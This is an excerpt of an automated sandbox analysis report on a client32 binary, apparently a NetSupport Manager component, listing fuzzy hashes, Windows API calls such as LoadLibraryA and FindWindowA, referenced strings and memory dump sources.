• Opcode Fuzzy Hash: 29a8f3e74b10ecb473689528bebe8d9fb683c07999dd0dfdb1f1582f8126aa29
• Instruction Fuzzy Hash: A0D02BB191032D7BC3048A81DC42ED6F3CCEB04365F004036F62656100D670E440C3D4
APIs
• KillTimer.USER32(?,?), ref: 1100102B
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 11001016
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitKillLastMessageProcessTimerwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2229609774-2830328467
• Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
• Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
• Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
• Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
APIs
• GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
• LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: LibraryLoadVersion
• String ID: AudioCapture.dll
• API String ID: 3209957514-2642820777
• Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
• Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
• Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
• Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
APIs
• FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
• SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
Strings
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
Similarity
• API ID: FindMessageSendWindow
• String ID: MSOfficeWClass
• API String ID: 1741975844-970895155
APIs
• DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
• String ID: ..\ctl32\wndclass.cpp$m_hWnd
• API String ID: 1417657345-2201682149
APIs
• GetMenu.USER32(00000000), ref: 1101D3B4
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 1101D3A3
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: ErrorExitLastMenuMessageProcesswsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 1590435379-2830328467
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: MenuProp
• String ID: OldMenu
• API String ID: 601939786-3235417843